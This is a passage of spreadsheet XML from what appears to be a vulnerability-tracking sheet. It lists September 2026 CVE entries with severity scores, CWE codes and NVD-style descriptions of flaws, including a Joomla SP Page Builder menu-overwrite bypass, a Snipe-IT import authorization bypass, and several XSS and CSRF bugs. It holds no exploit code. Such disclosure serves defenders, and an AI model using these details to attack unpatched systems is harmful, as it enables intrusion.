          <t>Joomla Extension - joomshaper.com - Missing Access Control in Menu Item Creation in SP Page Builder (Free and Pro) 4.0.0 - 6.9.0 - The add-to-menu routine invoked the com_menus item model's save() method directly. That model does not perform authorisation itself, because the relevant checks reside in the com_menus controller, and the only check applied was core.edit on com_sppagebuilder. Users with no permissions whatsoever on com_menus could therefore create menu items, and because the record identifier was taken from the submitted jform[menuid] field, could also overwrite existing ones. The home flag was read back from the database and preserved, so the site's home menu item could be repointed while remaining the home item.</t>
        </is>
      </c>
      <c r="S1234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81566</t>
        </is>
      </c>
    </row>
    <row r="1235">
      <c r="A1235" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1235" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81869</t>
        </is>
      </c>
      <c r="D1235" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1235" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1235" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1235" s="5" t="inlineStr"/>
      <c r="H1235" s="5" t="inlineStr"/>
      <c r="I1235" s="5" t="inlineStr"/>
      <c r="J1235" s="5" t="inlineStr"/>
      <c r="K1235" s="5" t="inlineStr"/>
      <c r="L1235" s="5" t="inlineStr"/>
      <c r="M1235" s="5" t="inlineStr"/>
      <c r="N1235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1235" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1235" s="5" t="inlineStr"/>
      <c r="Q1235" s="5" t="inlineStr">
        <is>
          <t>CWE-176, CWE-400</t>
        </is>
      </c>
      <c r="R1235" s="5" t="inlineStr">
        <is>
          <t>OpenTelemetry-Go is the Go implementation of OpenTelemetry. From version 1.10.0 until 1.33.0, the sdk/trace/span.go attribute truncation path can fail to enforce AttributeValueLengthLimit for string and string-slice attributes containing the valid Unicode replacement character U+FFFD. safeTruncateValidUTF8 treats the valid replacement rune as invalid UTF-8 and returns the original input, while strings.ToValidUTF8 leaves that valid rune unchanged, so a second safeTruncate attempt can also return the oversized value. An attacker who controls span attribute content can retain values longer than the configured limit, increasing per-span memory use and weakening denial-of-service protection in the instrumented process. This issue is fixed in version 1.33.0.</t>
        </is>
      </c>
      <c r="S1235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81869</t>
        </is>
      </c>
    </row>
    <row r="1236">
      <c r="A1236" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1236" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82764</t>
        </is>
      </c>
      <c r="D1236" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1236" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1236" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G1236" s="5" t="inlineStr"/>
      <c r="H1236" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1236" s="5" t="inlineStr"/>
      <c r="J1236" s="5" t="inlineStr"/>
      <c r="K1236" s="5" t="inlineStr"/>
      <c r="L1236" s="5" t="inlineStr"/>
      <c r="M1236" s="5" t="inlineStr"/>
      <c r="N1236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1236" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1236" s="5" t="inlineStr"/>
      <c r="Q1236" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R1236" s="5" t="inlineStr">
        <is>
          <t>Cross-site request forgery vulnerability exists in multiple Contec products. If a user views a specially crafted page while logged in to the affected product, unintended operations may be performed.</t>
        </is>
      </c>
      <c r="S1236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82764</t>
        </is>
      </c>
    </row>
    <row r="1237">
      <c r="A1237" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1237" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82773</t>
        </is>
      </c>
      <c r="D1237" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1237" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1237" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G1237" s="5" t="inlineStr"/>
      <c r="H1237" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1237" s="5" t="inlineStr"/>
      <c r="J1237" s="5" t="inlineStr"/>
      <c r="K1237" s="5" t="inlineStr"/>
      <c r="L1237" s="5" t="inlineStr"/>
      <c r="M1237" s="5" t="inlineStr"/>
      <c r="N1237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1237" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1237" s="5" t="inlineStr"/>
      <c r="Q1237" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1237" s="5" t="inlineStr">
        <is>
          <t>Cross-site scripting vulnerability exists in CONPROSYS M2M Gateway Series and CONPROSYS M2M Controller Series. If this vulnerability is exploited, an arbitrary script may be executed on a logged-in user's web browser.</t>
        </is>
      </c>
      <c r="S1237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82773</t>
        </is>
      </c>
    </row>
    <row r="1238">
      <c r="A1238" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1238" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82776</t>
        </is>
      </c>
      <c r="D1238" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1238" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1238" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G1238" s="5" t="inlineStr"/>
      <c r="H1238" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1238" s="5" t="inlineStr"/>
      <c r="J1238" s="5" t="inlineStr"/>
      <c r="K1238" s="5" t="inlineStr"/>
      <c r="L1238" s="5" t="inlineStr"/>
      <c r="M1238" s="5" t="inlineStr"/>
      <c r="N1238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1238" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1238" s="5" t="inlineStr"/>
      <c r="Q1238" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1238" s="5" t="inlineStr">
        <is>
          <t>Cross-site scripting vulnerability exists in CONPROSYS PAC Series. If this vulnerability is exploited, an arbitrary script may be executed on a logged-in user's web browser.</t>
        </is>
      </c>
      <c r="S1238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82776</t>
        </is>
      </c>
    </row>
    <row r="1239">
      <c r="A1239" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1239" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82781</t>
        </is>
      </c>
      <c r="D1239" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1239" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1239" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G1239" s="5" t="inlineStr"/>
      <c r="H1239" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1239" s="5" t="inlineStr"/>
      <c r="J1239" s="5" t="inlineStr"/>
      <c r="K1239" s="5" t="inlineStr"/>
      <c r="L1239" s="5" t="inlineStr"/>
      <c r="M1239" s="5" t="inlineStr"/>
      <c r="N1239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1239" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1239" s="5" t="inlineStr"/>
      <c r="Q1239" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1239" s="5" t="inlineStr">
        <is>
          <t>Cross-site scripting vulnerability exists in CONPROSYS nano Series. If this vulnerability is exploited, an arbitrary script may be executed on a logged-in user's web browser.</t>
        </is>
      </c>
      <c r="S1239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82781</t>
        </is>
      </c>
    </row>
    <row r="1240">
      <c r="A1240" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1240" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82788</t>
        </is>
      </c>
      <c r="D1240" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1240" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1240" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G1240" s="5" t="inlineStr"/>
      <c r="H1240" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1240" s="5" t="inlineStr"/>
      <c r="J1240" s="5" t="inlineStr"/>
      <c r="K1240" s="5" t="inlineStr"/>
      <c r="L1240" s="5" t="inlineStr"/>
      <c r="M1240" s="5" t="inlineStr"/>
      <c r="N1240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1240" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1240" s="5" t="inlineStr"/>
      <c r="Q1240" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1240" s="5" t="inlineStr">
        <is>
          <t>Cross-site scripting vulnerability exists in CPSL-08P1EN. If this vulnerability is exploited, an arbitrary script may be executed on a logged-in user's web browser.</t>
        </is>
      </c>
      <c r="S1240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82788</t>
        </is>
      </c>
    </row>
    <row r="1241">
      <c r="A1241" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1241" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82795</t>
        </is>
      </c>
      <c r="D1241" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1241" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1241" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G1241" s="5" t="inlineStr"/>
      <c r="H1241" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1241" s="5" t="inlineStr"/>
      <c r="J1241" s="5" t="inlineStr"/>
      <c r="K1241" s="5" t="inlineStr"/>
      <c r="L1241" s="5" t="inlineStr"/>
      <c r="M1241" s="5" t="inlineStr"/>
      <c r="N1241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1241" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1241" s="5" t="inlineStr"/>
      <c r="Q1241" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1241" s="5" t="inlineStr">
        <is>
          <t>SolarView Compact contains a cross-site scripting vulnerability in Schedule Settings and Mail Send Setting. If this vulnerability is exploited, an arbitrary OS command may be executed by an attacker who can log in to the product.</t>
        </is>
      </c>
      <c r="S1241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82795</t>
        </is>
      </c>
    </row>
    <row r="1242">
      <c r="A1242" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1242" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82796</t>
        </is>
      </c>
      <c r="D1242" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1242" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1242" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G1242" s="5" t="inlineStr"/>
      <c r="H1242" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1242" s="5" t="inlineStr"/>
      <c r="J1242" s="5" t="inlineStr"/>
      <c r="K1242" s="5" t="inlineStr"/>
      <c r="L1242" s="5" t="inlineStr"/>
      <c r="M1242" s="5" t="inlineStr"/>
      <c r="N1242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1242" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1242" s="5" t="inlineStr"/>
      <c r="Q1242" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1242" s="5" t="inlineStr">
        <is>
          <t>SolarView Compact contains a cross-site scripting vulnerability in Image Management. If this vulnerability is exploited, an arbitrary OS command may be executed by an attacker who can log in to the product.</t>
        </is>
      </c>
      <c r="S1242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82796</t>
        </is>
      </c>
    </row>
    <row r="1243">
      <c r="A1243" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1243" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84701</t>
        </is>
      </c>
      <c r="D1243" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1243" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1243" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1243" s="5" t="inlineStr"/>
      <c r="H1243" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1243" s="5" t="inlineStr"/>
      <c r="J1243" s="5" t="inlineStr"/>
      <c r="K1243" s="5" t="inlineStr"/>
      <c r="L1243" s="5" t="inlineStr"/>
      <c r="M1243" s="5" t="inlineStr"/>
      <c r="N1243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1243" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P1243" s="5" t="inlineStr"/>
      <c r="Q1243" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1243" s="5" t="inlineStr">
        <is>
          <t>NocoBase fails to sanitize rich text field values in the read renderer, allowing users with create permissions to store malicious HTML with event handlers. Attackers can write arbitrary markup through the collection API that executes in the browsers of all users viewing the affected record.</t>
        </is>
      </c>
      <c r="S1243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84701</t>
        </is>
      </c>
    </row>
    <row r="1244">
      <c r="A1244" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1244" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85125</t>
        </is>
      </c>
      <c r="D1244" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1244" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1244" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G1244" s="5" t="inlineStr"/>
      <c r="H1244" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1244" s="5" t="inlineStr"/>
      <c r="J1244" s="5" t="inlineStr"/>
      <c r="K1244" s="5" t="inlineStr"/>
      <c r="L1244" s="5" t="inlineStr"/>
      <c r="M1244" s="5" t="inlineStr"/>
      <c r="N1244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1244" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1244" s="5" t="inlineStr"/>
      <c r="Q1244" s="5" t="inlineStr">
        <is>
          <t>CWE-940</t>
        </is>
      </c>
      <c r="R1244" s="5" t="inlineStr">
        <is>
          <t>The Android application "YAMAP -Social Trekking GPS App" contains an improper access control vulnerability in its WebView implementation. The in-app browser may cause information leakage from the app or redirect users to unintended websites.</t>
        </is>
      </c>
      <c r="S1244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85125</t>
        </is>
      </c>
    </row>
    <row r="1245">
      <c r="A1245" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1245" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86763</t>
        </is>
      </c>
      <c r="D1245" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1245" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1245" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1245" s="5" t="inlineStr"/>
      <c r="H1245" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1245" s="5" t="inlineStr"/>
      <c r="J1245" s="5" t="inlineStr"/>
      <c r="K1245" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1245" s="5" t="inlineStr"/>
      <c r="M1245" s="5" t="inlineStr"/>
      <c r="N1245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1245" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1245" s="5" t="inlineStr"/>
      <c r="Q1245" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1245" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions &gt;= 7.0.12 and &lt;= 8.6.3 contain an authorization bypass in the Livewire importer component (App\Livewire\Importer, mounted at the imports.index route). The component only checked the broad 'import' ability at mount time, while its files() and activeFile() computed properties queried the imports table with no owner or company scope. As a result, any authenticated non-superuser holding the import permission could view every Import record on the instance (original filename, file_path, filesize, import_type and creation timestamp) and could invoke the selectFile($id) Livewire action with any auto-incrementing Import ID to load another user's record, exposing its stored preview data (header_row column headers and first_row, the first data row of the CSV). Because import CSVs commonly contain personal data, asset serial numbers and license keys, this discloses sensitive information; in Full Multiple Companies Support (FMCS) deployments the disclosure also crosses company/tenant boundaries. Impact is limited to preview data rather than the full CSV file, and superusers were unaffected. Fixed in version 8.7.0, which scopes non-superuser reads to imports owned by the caller.</t>
        </is>
      </c>
      <c r="S1245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86763</t>
        </is>
      </c>
    </row>
    <row r="1246">
      <c r="A1246" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1246" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86772</t>
        </is>
      </c>
      <c r="D1246" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1246" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1246" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1246" s="5" t="inlineStr"/>
      <c r="H1246" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1246" s="5" t="inlineStr"/>
      <c r="J1246" s="5" t="inlineStr"/>
      <c r="K1246" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1246" s="5" t="inlineStr"/>
      <c r="M1246" s="5" t="inlineStr"/>
      <c r="N1246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1246" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1246" s="5" t="inlineStr"/>
      <c r="Q1246" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1246" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 contain a stored cross-site scripting vulnerability in DepartmentPresenter::formattedNameLink() where department names are rendered unescaped in the fallback branch for users without departments.view permission. Users with departments.edit permission can inject malicious scripts into department names that execute in the browsers of all department members when they load their My Assets page.</t>
        </is>
      </c>
      <c r="S1246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86772</t>
        </is>
      </c>
    </row>
    <row r="1247">
      <c r="A1247" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1247" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90563</t>
        </is>
      </c>
      <c r="D1247" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1247" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1247" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1247" s="5" t="inlineStr"/>
      <c r="H1247" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1247" s="5" t="inlineStr"/>
      <c r="J1247" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K1247" s="5" t="inlineStr"/>
      <c r="L1247" s="5" t="inlineStr"/>
      <c r="M1247" s="5" t="inlineStr"/>
      <c r="N1247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1247" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P1247" s="5" t="inlineStr"/>
      <c r="Q1247" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="R1247" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in maliangnansheng bbs-springboot 3.0.0. This affects the function utils.toToc of the file ArticleController.java. This manipulation causes cross site scripting. The attack is possible to be carried out remotely.</t>
        </is>
      </c>
      <c r="S1247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90563</t>
        </is>
      </c>
    </row>
    <row r="1248">
      <c r="A1248" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1248" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90568</t>
        </is>
      </c>
      <c r="D1248" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1248" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1248" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1248" s="5" t="inlineStr"/>
      <c r="H1248" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1248" s="5" t="inlineStr"/>
      <c r="J1248" s="5" t="inlineStr"/>
      <c r="K1248" s="5" t="inlineStr"/>
      <c r="L1248" s="5" t="inlineStr"/>
      <c r="M1248" s="5" t="inlineStr"/>
      <c r="N1248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1248" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P1248" s="5" t="inlineStr"/>
      <c r="Q1248" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="R1248" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in moxi624 Mogu Blog v2 up to 5.2. This affects the function BlogSortServiceImpl.addBlogSort of the file mogu_web/src/main/resources/templates/info.ftl of the component blogSort Endpoint. The manipulation of the argument sortName results in cross site scripting. The attack can be launched remotely. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S1248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90568</t>
        </is>
      </c>
    </row>
    <row r="1249">
      <c r="A1249" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1249" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90893</t>
        </is>
      </c>
      <c r="D1249" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1249" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1249" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G1249" s="5" t="inlineStr"/>
      <c r="H1249" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1249" s="5" t="inlineStr"/>
      <c r="J1249" s="5" t="inlineStr"/>
      <c r="K1249" s="5" t="inlineStr"/>
      <c r="L1249" s="5" t="inlineStr"/>
      <c r="M1249" s="5" t="inlineStr"/>
      <c r="N1249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1249" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1249" s="5" t="inlineStr"/>
      <c r="Q1249" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R1249" s="5" t="inlineStr">
        <is>
          <t>MISP contains a Cross-Site Request Forgery (CSRF) vulnerability in the UserSettingsController. The actions setTheme, setHomePage, and eventIndexColumnToggle were explicitly added to the Security component's unlockedActions list, which disabled all CSRF validation (both token and field-hash checks) for those endpoints. Because these endpoints accept POST requests and modify per-user application state (theme selection, default homepage URL, and event index column visibility), an attacker who can induce a logged-in MISP user to load a malicious page (e.g., via a crafted link, embedded image, or auto-submitting form) can forge requests that alter the victim's settings without their knowledge or consent. The most impactful action is setHomePage, which allows an attacker to redirect the victim's default landing page to an arbitrary attacker-controlled URL, potentially facilitating phishing or further social engineering. The setTheme action can alter the user's visual theme, and eventIndexColumnToggle can change which columns are displayed in the event index view. No authentication bypass is involved; the victim must already be authenticated to MISP. The vulnerability was reported by the Scottish Government National Cyber Team.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="S1249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90893</t>
        </is>
      </c>
    </row>
    <row r="1250">
      <c r="A1250" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1250" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90957</t>
        </is>
      </c>
      <c r="D1250" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1250" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1250" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G1250" s="5" t="inlineStr"/>
      <c r="H1250" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1250" s="5" t="inlineStr"/>
      <c r="J1250" s="5" t="inlineStr"/>
      <c r="K1250" s="5" t="inlineStr"/>
      <c r="L1250" s="5" t="inlineStr"/>
      <c r="M1250" s="5" t="inlineStr"/>
      <c r="N1250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1250" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1250" s="5" t="inlineStr"/>
      <c r="Q1250" s="5" t="inlineStr">
        <is>
          <t>CWE-693, CWE-79</t>
        </is>
      </c>
      <c r="R1250" s="5" t="inlineStr">
        <is>
